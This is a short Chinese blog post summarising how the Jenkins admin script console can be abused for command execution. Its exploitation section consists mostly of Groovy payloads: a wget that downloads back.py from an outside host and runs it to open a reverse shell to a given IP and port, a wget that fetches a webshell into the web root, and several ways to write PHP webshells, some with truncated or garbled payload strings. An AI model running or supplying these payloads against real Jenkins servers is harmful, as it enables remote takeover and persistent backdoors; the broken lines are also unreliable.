A-A+

Jenkins脚本命令执行漏洞小总结

2016年05月07日 11:42 汪洋大海 暂无评论 阅读 1,102 views 次

1,系统介绍

Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。

2,漏洞描述

Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,功能如图:

jenkins命令执行漏洞

利用该功能,可以执行系统命令,例如执行”whoami”命令,如图所示:

命令执行漏洞

该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在未授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。

3,漏洞利用

1) 直接wget下载back.py反弹shell,如下:

println "wget http://gdd.gd/tools/back.py -P /tmp/".execute().text
println "python /tmp/back.py 10.1.1.111 8080".execute().text
2)多种写webshell方法,如下:

① wget写webshell
println "wget http://gdd.gd/data/t.txt -o /var/www/html/media.php".execute().text


new File("/var/www/html/media.php").write('');


def webshell = ''
new File("/var/www/html/media.php").write("$webshell");

④追加法写webshell
def execute(cmd) {
def proc = cmd.execute()
proc.waitFor()
}
execute( [ 'bash', '-c', 'echo -n " execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/media.php' ] )
//参数-n 不要在最后自动换行

 

文章来源:http://www.nxadmin.com/penetration/1372.html

标签:

给我留言